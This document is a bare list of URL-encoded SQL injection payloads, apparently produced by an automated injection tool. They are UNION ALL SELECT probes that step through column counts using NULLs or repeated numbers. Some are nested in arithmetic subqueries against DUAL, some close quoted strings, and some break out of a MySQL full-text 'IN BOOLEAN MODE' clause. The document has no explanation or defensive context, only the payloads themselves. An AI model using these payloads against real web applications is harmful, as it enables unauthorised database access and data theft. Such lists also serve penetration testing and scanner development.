1%20%2B%20%28SELECT%201639%20FROM%20DUAL%20WHERE%205891%3D5891%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209491%20FROM%20DUAL%20WHERE%206523%3D6523%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202495%20FROM%20DUAL%20WHERE%202363%3D2363%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209625%20FROM%20DUAL%20WHERE%204072%3D4072%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202129%20FROM%20DUAL%20WHERE%208844%3D8844%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%209148%20FROM%20DUAL%20WHERE%209605%3D9605%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205248%20FROM%20DUAL%20WHERE%209543%3D9543%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203965%20FROM%20DUAL%20WHERE%204421%3D4421%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205449%20FROM%20DUAL%20WHERE%206676%3D6676%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208892%20WHERE%207181%3D7181%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%201723%20WHERE%204356%3D4356%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206266%20WHERE%202204%3D2204%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206848%20WHERE%202076%3D2076%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%205010%20WHERE%203496%3D3496%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%202832%20WHERE%209989%3D9989%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%203393%20WHERE%201704%3D1704%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206704%20WHERE%206980%3D6980%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%206630%20WHERE%209634%3D9634%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%20%2B%20%28SELECT%208644%20WHERE%203101%3D3101%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29 1%27%20%2B%20%28SELECT%20%27sfgN%27%20FROM%20DUAL%20WHERE%202544%3D2544%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27qeYD%27%20FROM%20DUAL%20WHERE%209129%3D9129%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27PFAZ%27%20FROM%20DUAL%20WHERE%207527%3D7527%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27VjEI%27%20FROM%20DUAL%20WHERE%206495%3D6495%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27RlsR%27%20FROM%20DUAL%20WHERE%207085%3D7085%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27IeOh%27%20FROM%20DUAL%20WHERE%207795%3D7795%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27rOio%27%20FROM%20DUAL%20WHERE%201478%3D1478%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27laQk%27%20FROM%20DUAL%20WHERE%204866%3D4866%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27prNS%27%20FROM%20DUAL%20WHERE%204007%3D4007%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27XHwG%27%20FROM%20DUAL%20WHERE%207847%3D7847%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27JTju%27%20WHERE%208891%3D8891%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27CNIt%27%20WHERE%203689%3D3689%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27vAZA%27%20WHERE%208268%3D8268%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27kMxE%27%20WHERE%207086%3D7086%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27gWPl%27%20WHERE%204323%3D4323%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27vaDy%27%20WHERE%208428%3D8428%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27kxcc%27%20WHERE%207149%3D7149%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27MLWx%27%20WHERE%206988%3D6988%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27ZLBX%27%20WHERE%207312%3D7312%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20%2B%20%28SELECT%20%27Vkod%27%20WHERE%203971%3D3971%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%29%20%2B%20%27 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20%20%23 -7164%29%20UNION%20ALL%20SELECT%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047%2C%206047--%20 -3695%29%20UNION%20ALL%20SELECT%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461%2C%205461--%20 -2834%29%20UNION%20ALL%20SELECT%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782%2C%203782--%20 -6220%29%20UNION%20ALL%20SELECT%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158%2C%201158--%20 -3928%29%20UNION%20ALL%20SELECT%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940%2C%202940--%20 -9185%29%20UNION%20ALL%20SELECT%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732%2C%202732--%20 -9846%29%20UNION%20ALL%20SELECT%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108%2C%204108--%20 -2696%29%20UNION%20ALL%20SELECT%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530%2C%202530--%20 -3401%29%20UNION%20ALL%20SELECT%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571%2C%202571--%20 -3011%29%20UNION%20ALL%20SELECT%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036%2C%202036--%20 -3371%27%29%20UNION%20ALL%20SELECT%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839%2C%201839--%20 